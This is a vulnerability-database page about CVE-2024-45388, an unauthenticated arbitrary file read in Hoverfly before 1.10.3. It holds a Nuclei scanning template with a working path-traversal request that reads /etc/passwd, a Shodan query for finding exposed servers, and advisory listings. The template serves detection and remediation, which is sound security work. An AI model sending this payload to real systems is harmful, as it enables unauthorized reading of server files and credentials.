| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
| ofensive-playbook | 16 Apr 202616:40 | – | githubexploit | |
| ffensive-playbook | 16 Apr 202616:40 | – | githubexploit | |
| CVE-2024-45388 | 2 Sep 202421:24 | – | circl | |
| Hoverfly 安全漏洞 | 2 Sep 202400:00 | – | cnnvd | |
| CVE-2024-45388 | 2 Sep 202416:07 | – | cve | |
| CVE-2024-45388 Arbitrary file read in the `/api/v2/simulation` endpoint in hoverfly (`GHSL-2023-274`) | 2 Sep 202416:07 | – | cvelist | |
| Hoverfly allows an arbitrary file read in the `/api/v2/simulation` endpoint (`GHSL-2023-274`) | 3 Sep 202421:01 | – | github | |
| CVE-2024-45388 | 2 Sep 202418:15 | – | nvd | |
| CVE-2024-45388 Arbitrary file read in the `/api/v2/simulation` endpoint in hoverfly (`GHSL-2023-274`) | 2 Sep 202416:07 | – | osv | |
| GHSA-6XX4-X46F-F897 Hoverfly allows an arbitrary file read in the `/api/v2/simulation` endpoint (`GHSL-2023-274`) | 3 Sep 202421:01 | – | osv |
id: CVE-2024-45388
info:
name: Hoverfly < 1.10.3 - Arbitrary File Read
author: iamnoooob,rootxharsh,pdresearch
severity: high
description: |
Hoverfly is a lightweight service virtualization/ API simulation / API mocking tool for developers and testers. The /api/v2/simulation POST handler allows users to create new simulation views from the contents of a user-specified file. This feature can be abused by an attacker to read arbitrary files from the Hoverfly server.
impact: |
Unauthenticated attackers can read arbitrary files from the Hoverfly server including sensitive configuration data.
remediation: |
Update Hoverfly to version 1.10.3 or later.
reference:
- https://github.com/advisories/GHSA-6xx4-x46f-f897
- https://nvd.nist.gov/vuln/detail/CVE-2024-45388
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2024-45388
cwe-id: CWE-20
epss-score: 0.55864
epss-percentile: 0.98923
metadata:
max-request: 1
verified: true
shodan-query: http.favicon.hash:1357234275
tags: cve,cve2024,hoverfly,lfi,intrusive,vkev,vuln
http:
- raw:
- |
PUT /api/v2/simulation HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
{"data":{"pairs":[{"request":{},"response":{"bodyFile": "../../../../../../../etc/passwd","x":"aaa"}} ]},"meta":{"schemaVersion":"v5.3"}}
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- 'hoverflyVersion'
condition: and
- type: word
part: header
words:
- application/json
- type: status
status:
- 200
# digest: 4a0a00473045022100bde7274a86bcdfc0b2b5fb5f2f04b81fb9577deadb7345b05fbe37f9185a806102200721081e72f7a1c7f73b4f1cc8e94778aed488df569855707f02ca905d70d69f:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation